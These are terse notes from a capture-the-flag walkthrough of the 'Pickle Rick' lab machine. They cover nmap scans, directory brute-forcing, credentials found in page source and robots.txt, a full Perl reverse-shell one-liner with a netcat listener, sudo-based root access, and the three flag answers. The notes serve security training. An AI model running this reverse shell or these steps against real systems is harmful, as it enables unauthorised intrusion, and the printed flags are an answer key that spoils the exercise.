Pickle Rick 

nmap -sn 10.10.216.6
nmap -Pn -sV -sC 10.10.216.6

port 20,80

http://10.10.216.6
view-source:http://10.10.216.6/
<!--
    Note to self, remember username!
    Username: R1ckRul3s
  -->
http://10.10.216.6/robots.txt
Wubbalubbadubdub

feroxbuster -u http://10.10.216.6 -w usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt 

used dirsearch 

http://10.10.216.6/assets/

login.php

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

perl -e 'use Socket;$i="10.11.9.12";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

nc -lvnp 1234

GOT SHELL!!!

pwd
ls
cat Sup3rS3cretPickl3Ingred.txt

mr. meeseek hair

cd /home/rick
cat "second ingredients"

1 jerry tear

sudo -l

(ALL) NOPASSWD: ALL

ls /root
sudo ls /root
sudo cat /root/3rd.txt

3rd ingredients: fleeb juice



